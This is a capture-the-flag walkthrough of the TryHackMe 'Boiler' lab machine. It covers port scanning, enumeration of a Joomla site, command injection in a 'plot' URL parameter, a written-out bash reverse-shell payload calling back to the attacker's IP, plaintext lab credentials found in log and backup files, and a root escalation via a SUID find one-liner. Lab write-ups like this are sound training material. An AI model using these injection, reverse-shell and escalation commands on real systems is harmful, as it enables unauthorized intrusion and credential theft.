Boiler CTF - wook413

#tryhackme #linux #medium ![[Pasted image 20250704223411.png]] --- # Information Gathering - Nmap Initial TCP scan against all ports revealed 4 open ports: 21, 80, 10000, and 55007 ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 20:03 CDT Nmap scan report for 10.10.250.59 Host is up (0.13s latency). Not shown: 65511 closed tcp ports (reset), 20 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 10000/tcp open snet-sensor-mgmt 55007/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 24.47 seconds ``` A more detailed TCP scan gave us more information about those ports found. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sC -sV $IP -p 21,80,10000,55007 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 20:37 CDT Nmap scan report for 10.10.250.59 Host is up (0.13s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.23.133.183 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 10000/tcp open http MiniServ 1.930 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). 55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA) | 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA) |_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.61 seconds ``` UDP scan against top 1,000 ports revealed one open port: 10000 ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 20:11 CDT Nmap scan report for 10.10.250.59 Host is up (0.13s latency). Not shown: 993 open|filtered udp ports (no-response) PORT STATE SERVICE 989/udp closed ftps-data 2967/udp closed symantec-av 3389/udp closed ms-wbt-server 5355/udp closed llmnr 10000/udp open ndmp 22124/udp closed unknown 38063/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 1.22 seconds ``` --- # Footprinting ##### Port 21 As the Nmap showed us, I was able to login as `anonymous` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ftp $IP Connected to 10.10.250.59. 220 (vsFTPd 3.0.3) Name (10.10.250.59:parallels): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ``` There was only one file in the server, a hidden file named `.info.txt` ```bash ftp> ls -la 229 Entering Extended Passive Mode (|||46721|) 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 . drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .. -rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt 226 Directory send OK. ``` The content of `.info.txt` appears to be `ROT13-encoded` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ cat .info.txt Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl! ``` Hahaha. Brilliant move from the creator of this box :) ![[Pasted image 20250704204401.png]] ##### Port 10000 Nmap tells us the version of the service on this port is `MiniServ 1.930`. ![[Pasted image 20250704203401.png]] ##### Port 80 The website hosted on port 80 is just an Apache2 Ubuntu Default Page. ![[Pasted image 20250704203153.png]] `/robots.txt` shows some directories we can try explore to and a line of random numbers. ![[Pasted image 20250704202349.png]] With the help of `Gobuster` tool, I found `/joomla` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.250.59 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /manual (Status: 301) [Size: 313] [--> http://10.10.250.59/manual/] /joomla (Status: 301) [Size: 313] [--> http://10.10.250.59/joomla/] ``` `/joomla` reveals what appears to be a website page named `THM Boiler Room`. We can get a hint that it's using `joomla` CMS by the name. ![[Pasted image 20250704205937.png]] Ran one more `gobuster` but this time against `/joomla` and I was able to enumerate some directories which might have some useful information. ![[Pasted image 20250704211703.png]] On `/joomla/administrator` , there exists another login form. However, we haven't found any credentials yet. ![[Pasted image 20250704210946.png]] `/joomla/_files` page has some interesting looking strings written on the page, which appears to be base64-encoded. ![[Pasted image 20250704211306.png]] It means `Whopsie daisy`. Not sure where I could use this yet. ![[Pasted image 20250704211448.png]] # Exploit `/joomla/_test` contains something very interesting that might lead us to a possible exploit. It also has a file upload functionality. ![[Pasted image 20250704215212.png]] Even before the file upload functionality, when clicking on `New` button, I noticed the url now has a parameter `plot`. It's very worth to try command injection here. ![[Pasted image 20250704220055.png]] I appended `;id` after `NEW` and I was able to get the value of `id` command which indicates command injection actually works. ![[Pasted image 20250704220450.png]] I've injected the command below to get a reverse shell. `http://10.10.250.59/joomla/_test/index.php?plot=NEW;bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.23.133.183%2F1234+0%3E%261%22` Got a shell! ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Downloads] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.23.133.183] from (UNKNOWN) [10.10.250.59] 33010 bash: cannot set terminal process group (1130): Inappropriate ioctl for device bash: no job control in this shell www-data@Vulnerable:/var/www/html/joomla/_test$ whoami whoami www-data ``` # Lateral Movement `log.txt` might be exposing a set of credentials `basterd:superduperp@$` ```bash www-data@Vulnerable:/var/www/html/joomla/_test$ cat log.txt cat log.txt Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22. Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22. Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$ Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0) Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824 Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating. ``` Confirmed the user `basterd` exists on the system. ```bash www-data@Vulnerable:/var/www/html/joomla/_test$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash <SNIP> dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false stoner:x:1000:1000:stoner,,,:/home/stoner:/bin/bash mysql:x:110:118:MySQL Server,,,:/nonexistent:/bin/false basterd:x:1001:1001::/home/basterd: ftp:x:111:119:ftp daemon,,,:/srv/ftp:/bin/false sshd:x:112:65534::/var/run/sshd:/usr/sbin/nologin ``` logged in as `basterd` ```bash www-data@Vulnerable:/home$ su basterd Password: basterd@Vulnerable:/home$ whoami basterd ``` `backup.sh` file stored in `/home/basterd` reveals the credentials of the user `stoner` ```bash basterd@Vulnerable:~$ cat backup.sh REMOTE=1.2.3.4 SOURCE=/home/stoner TARGET=/usr/local/backup LOG=/home/stoner/bck.log DATE=`date +%y\.%m\.%d\.` USER=stoner #superduperp@$no1knows ssh $USER@$REMOTE mkdir $TARGET/$DATE if [ -d "$SOURCE" ]; then for i in `ls $SOURCE | grep 'data'`;do echo "Begining copy of" $i >> $LOG scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE echo $i "completed" >> $LOG if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then rm $SOURCE/$i echo $i "removed" >> $LOG echo "####################" >> $LOG else echo "Copy not complete" >> $LOG exit 0 fi done else echo "Directory is not present" >> $LOG exit 0 fi ``` successfully logged in as `stoner` ```bash basterd@Vulnerable:~$ su stoner Password: stoner@Vulnerable:/home/basterd$ whoami stoner ``` # Privilege Escalation The creator of the box got me again. ```bash stoner@Vulnerable:~$ sudo -l User stoner may run the following commands on Vulnerable: (root) NOPASSWD: /NotThisTime/MessinWithYa ``` Looking for files that have SUID bits set. ```bash stoner@Vulnerable:/opt$ find / -type f -perm -4000 2>/dev/null /bin/su /bin/fusermount /bin/umount /bin/mount /bin/ping6 /bin/ping /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/apache2/suexec-custom /usr/lib/apache2/suexec-pristine /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/bin/newgidmap /usr/bin/find /usr/bin/at /usr/bin/chsh /usr/bin/chfn /usr/bin/passwd /usr/bin/newgrp /usr/bin/sudo /usr/bin/pkexec /usr/bin/gpasswd /usr/bin/newuidmap ``` Among the binaries, `/usr/bin/find` stood out to me because the binary `find` usually would not have the SUID bit set. ```bash stoner@Vulnerable:/opt$ ls -la /usr/bin/find -r-sr-xr-x 1 root root 232196 Feb 8 2016 /usr/bin/find ``` I referred to `gtfobins.github.io` and then successfully exploited root :) ```bash stoner@Vulnerable:/opt$ find . -exec /bin/sh -p \; -quit # whoami root ```